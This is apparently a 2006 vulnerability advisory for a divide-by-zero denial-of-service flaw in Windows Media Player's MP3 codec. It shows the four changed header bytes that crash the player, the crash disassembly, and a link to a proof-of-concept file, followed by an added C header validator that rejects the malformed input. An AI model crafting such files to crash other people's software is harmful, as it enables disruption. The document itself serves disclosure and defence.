Windows Media Player 11 .MP3 Divide By Zero DoS
Release Date:
November 21st, 2006
Severity:
Low
Vendor:
Microsoft
Versions Affected:
Windows Media Player 11
Windows Media Player 10
Windows Media Player 9
Zune Player 1.0.5341.0
Platforms Affected:
Windows XP SP2
Windows Vista
Overview:
A divide-by-zero flaw exists in Windows Media Player 11 and all prior versions. It allows an attacker to crash the application by sending a user a specially crafted .MP3 file.
Technical Details:
The l3codeca.acm codec (version 1.9.0.305) does not properly handle malformed .mp3 files. Below are the differences between the source file and the malformed file; the two headers differ only in the four bytes at offset 0x18:
Source File
52 49 46 46 BE 74 05 00 57 41 56 45 66 6D 74 20
1E 00 00 00 55 00 02 00 C0 5D 00 00 58 1B 00 00
Modified File
52 49 46 46 BE 74 05 00 57 41 56 45 66 6D 74 20
1E 00 00 00 55 00 02 00 AA AA AA AA 58 1B 00 00
Below is the crash triggered on Windows XP SP2 using Windows Media Player 11.0.5705.5043. ECX, the divisor, is zero when the DIV instruction executes:
58392AD2 F7F1 DIV ECX <(=- We Crash Here
58392AD4 33D2 XOR EDX,EDX
58392AD6 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
58392ADA 8BC7 MOV EAX,EDI
58392ADC F7F1 DIV ECX
58392ADE 85D2 TEST EDX,EDX
58392AE0 74 04 JE SHORT l3codeca.58392AE6
EAX 000003F0
ECX 00000000
EDX 00000000
EBX 00000480
ESP 03FDFB38
EBP 03FDFBDC
ESI 04384DA2
EDI 000003F0
EIP 58392AD2 l3codeca.58392AD2
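The four changed bytes occupy the nSamplesPerSec field of the RIFF "fmt " chunk (format tag 0x0055, MPEG Layer 3). The following pre-decode sanity check is an added example, not code from the advisory or the vendor; it rejects such a header before it reaches a codec. The function and enum names are hypothetical, and it assumes the standard WAVEFORMATEX layout and the standard MPEG audio sampling rates.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical names; header bytes are the two 32-byte dumps from the advisory. */
enum wav_verdict { WAV_OK, WAV_NOT_WAVE, WAV_NO_FMT, WAV_BAD_CHANNELS, WAV_BAD_RATE, WAV_BAD_BYTERATE };
static const uint8_t SOURCE_HDR[32] = {
    0x52,0x49,0x46,0x46,0xBE,0x74,0x05,0x00,0x57,0x41,0x56,0x45,0x66,0x6D,0x74,0x20,
    0x1E,0x00,0x00,0x00,0x55,0x00,0x02,0x00,0xC0,0x5D,0x00,0x00,0x58,0x1B,0x00,0x00};
static const uint8_t MODIFIED_HDR[32] = {
    0x52,0x49,0x46,0x46,0xBE,0x74,0x05,0x00,0x57,0x41,0x56,0x45,0x66,0x6D,0x74,0x20,
    0x1E,0x00,0x00,0x00,0x55,0x00,0x02,0x00,0xAA,0xAA,0xAA,0xAA,0x58,0x1B,0x00,0x00};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t le32(const uint8_t *p) { return le16(p) | ((uint32_t)le16(p + 2) << 16); }

/* Sampling rates defined for MPEG-1, MPEG-2 and MPEG-2.5 audio. */
static int is_mpeg_rate(uint32_t hz) {
    static const uint32_t ok[] = {8000, 11025, 12000, 16000, 22050, 24000, 32000, 44100, 48000};
    for (size_t i = 0; i < sizeof ok / sizeof ok[0]; i++)
        if (ok[i] == hz) return 1;
    return 0;
}

/* buf may be a prefix of the file: only the first 12 bytes of the "fmt "
   body (wFormatTag .. nAvgBytesPerSec) have to be present. */
enum wav_verdict check_wave_header(const uint8_t *buf, size_t len) {
    if (len < 12 || memcmp(buf, "RIFF", 4) || memcmp(buf + 8, "WAVE", 4)) return WAV_NOT_WAVE;
    for (size_t off = 12; len - off >= 8; ) {          /* walk chunks, bounds-checked */
        uint32_t size = le32(buf + off + 4);
        if (memcmp(buf + off, "fmt ", 4) == 0) {
            if (size < 12 || len - off - 8 < 12) return WAV_NO_FMT;
            const uint8_t *f = buf + off + 8;
            uint16_t tag = le16(f), channels = le16(f + 2);
            uint32_t rate = le32(f + 4), byte_rate = le32(f + 8);
            if (channels == 0 || (tag == 0x0055 && channels > 2)) return WAV_BAD_CHANNELS;
            if (rate == 0 || (tag == 0x0055 && !is_mpeg_rate(rate))) return WAV_BAD_RATE;
            return byte_rate == 0 ? WAV_BAD_BYTERATE : WAV_OK;
        }
        uint64_t skip = (uint64_t)size + (size & 1);   /* chunks are word-aligned */
        if (skip > len - off - 8) break;
        off += 8 + (size_t)skip;
    }
    return WAV_NO_FMT;
}

int main(void) {
    printf("source=%d modified=%d\n", check_wave_header(SOURCE_HDR, 32), check_wave_header(MODIFIED_HDR, 32));
    return 0;
}
```

The source header passes with a 24000 Hz rate, while the modified header is rejected because 0xAAAAAAAA is not a valid MPEG sampling rate.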
Vendor Status:
Vendor was notified.
Solution:
Don't open untrusted .MP3 files, or use another media player.
Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com
Related Links:
http://security-protocols.com/poc/sp-x35.mp3
http://security-protocols.com/sp-x35-advisory.php
http://microsoft.com/windows/windowsmedia/default.mspx
2006 Security-Protocols, LLC







